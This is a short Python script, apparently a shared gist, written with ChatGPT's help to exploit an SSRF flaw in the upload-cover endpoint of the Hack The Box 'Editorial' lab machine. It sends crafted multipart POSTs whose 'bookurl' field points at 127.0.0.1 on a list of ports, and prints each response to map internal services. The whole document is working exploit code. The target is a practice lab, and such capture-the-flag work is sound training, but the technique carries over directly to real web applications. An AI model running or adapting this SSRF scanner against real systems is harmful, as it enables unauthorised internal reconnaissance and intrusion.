Created
June 21, 2024 07:21
This script was generated with the help of ChatGPT to test certain ports through the SSRF vulnerability on the HTB Editorial machine.
import sys

import requests
# Loopback ports that the script asks about, one request per port.
ports = [
    80,
    8080,
    8000,
    6666,
    8081,
    5000,
]

# Endpoint that receives the multipart POST.
url = "http://editorial.htb/upload-cover"

# Browser-like request headers. The Content-Type boundary has to stay in sync
# with the delimiter that create_form_data() writes into the body, and
# Content-Length is filled in per request by the loop at the bottom of the file.
headers = {
    "Host": "editorial.htb",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "multipart/form-data; boundary=---------------------------49391253437583440473430002952",
    "Origin": "http://editorial.htb",
    "DNT": "1",
    "Connection": "close",
    "Referer": "http://editorial.htb/upload",
}
def create_form_data(port):
    """Return the multipart/form-data body for one port, as a str.

    The body has two parts: a ``bookurl`` field holding
    ``http://127.0.0.1:<port>`` and an empty ``bookfile`` upload named
    ``TEST``. Lines are CRLF-terminated and the body ends with the closing
    delimiter.

    NOTE(review): the delimiter below is expected to be the boundary value
    from the Content-Type header prefixed with ``--``; keep the two in sync.
    """
    delimiter = "-----------------------------49391253437583440473430002952"
    pieces = [
        # Part 1: the URL field. Its value points at the loopback address.
        f"{delimiter}\r\n",
        'Content-Disposition: form-data; name="bookurl"\r\n\r\n',
        f"http://127.0.0.1:{port}\r\n",
        # Part 2: an empty file upload.
        f"{delimiter}\r\n",
        'Content-Disposition: form-data; name="bookfile"; filename="TEST"\r\n',
        "Content-Type: application/octet-stream\r\n\r\n\r\n",
        # Closing delimiter.
        f"{delimiter}--\r\n",
    ]
    return "".join(pieces)
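# Upper bound, in seconds, for each POST. Without a timeout, requests waits
# indefinitely, so a single stalled connection would hang the whole run.
REQUEST_TIMEOUT_SECONDS = 10

# Send one POST per port and print what the endpoint returned for it.
for port in ports:
    form_data = create_form_data(port)
    body = form_data.encode("utf-8")
    # Content-Length counts bytes on the wire, so measure the encoded body
    # rather than the str.
    headers["Content-Length"] = str(len(body))
    try:
        response = requests.post(
            url,
            headers=headers,
            data=body,
            timeout=REQUEST_TIMEOUT_SECONDS,
        )
    except requests.RequestException as exc:
        # A timeout or connection error on one port should not abort the
        # remaining requests; report it on stderr and move on.
        print(f"Port: {port} request failed: {exc}", file=sys.stderr)
        continue

    # Print the response status and content for each port.
    print(f"Port: {port}")
    print(f"Status Code: {response.status_code}")
    print(f"Response Text: {response.text}\n")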